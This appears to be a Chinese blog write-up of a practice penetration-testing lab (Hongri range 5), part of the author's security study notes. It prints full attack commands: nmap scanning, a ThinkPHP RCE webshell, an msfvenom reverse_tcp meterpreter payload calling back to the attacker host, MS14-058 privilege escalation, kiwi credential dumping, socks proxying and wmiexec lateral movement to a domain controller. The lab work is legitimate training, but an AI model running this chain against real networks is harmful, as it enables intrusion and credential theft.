无境红日靶场五 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 内网渗透初探
  29. 记对外国某服务器的内网渗透
  30. 一次丝滑的内网渗透拿下域控
  31. 实战内网PTH上线域控
  32. 通过路由器进行内网渗透
  33. 钓鱼邮件和钓鱼样本
  34. 无境vulntarget-a wp
  35. 无境ZeroLogon 练习 wp
  36. 无境三层综合渗透 wp

一层Win7

WebShell

目标IP:192.168.111.150,用nmap快速扫全端口

nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.150

在这里插入图片描述
重点是80端口的web服务,打开发现是一个Thinkphp
在这里插入图片描述
使用利用工具测试,存在ThinkPHP 5.0.22/5.1.29 RCE
在这里插入图片描述
用工具一键getshell
在这里插入图片描述
Administrator权限的Win7,明显在域中
在这里插入图片描述

Msf

用reverse_tcp生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.25 lport=6666 -f exe > 1.exe

msfconsole这样子配置

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

把生成的1.exe放到服务器上运行,成功获取到meterpreter
在这里插入图片描述

提权

systeminfo看补丁信息
在这里插入图片描述
我靠这么多
考虑使用MS14-058进行提权

use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.111.25
set target 1
run

成功得到SYSTEM的meterpreter
在这里插入图片描述

抓密码

load kiwi

在这里插入图片描述

creds_all

在这里插入图片描述
666演都不演了,得到密码为dc123.com

横向

systeminfo查到当前域为sun.com
在这里插入图片描述
用meterpreter直接查域控

run post/windows/gather/enum_domain

在这里插入图片描述
得到域控IP为192.168.138.138

二层域控

一级代理

用autoroute建立一级代理,走192.168.138.0/24

run post/multi/manage/autoroute

在这里插入图片描述
然后创建socks5代理

use auxiliary/server/socks_proxy
run

在这里插入图片描述
用proxychain来配置代理,在/etc/proxychain4.conf最后一行加上

socks5	127.0.0.1 1080

可以用nc测试代理是否建立成功

proxychains nc -zv 192.168.138.138 445

在这里插入图片描述
能连通即为成功

wmiexec

直接用psexec横向getshell

proxychains impacket-wmiexec SUN/Administrator:'dc123.com'@192.168.138.138

在这里插入图片描述

好简单的靶场

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值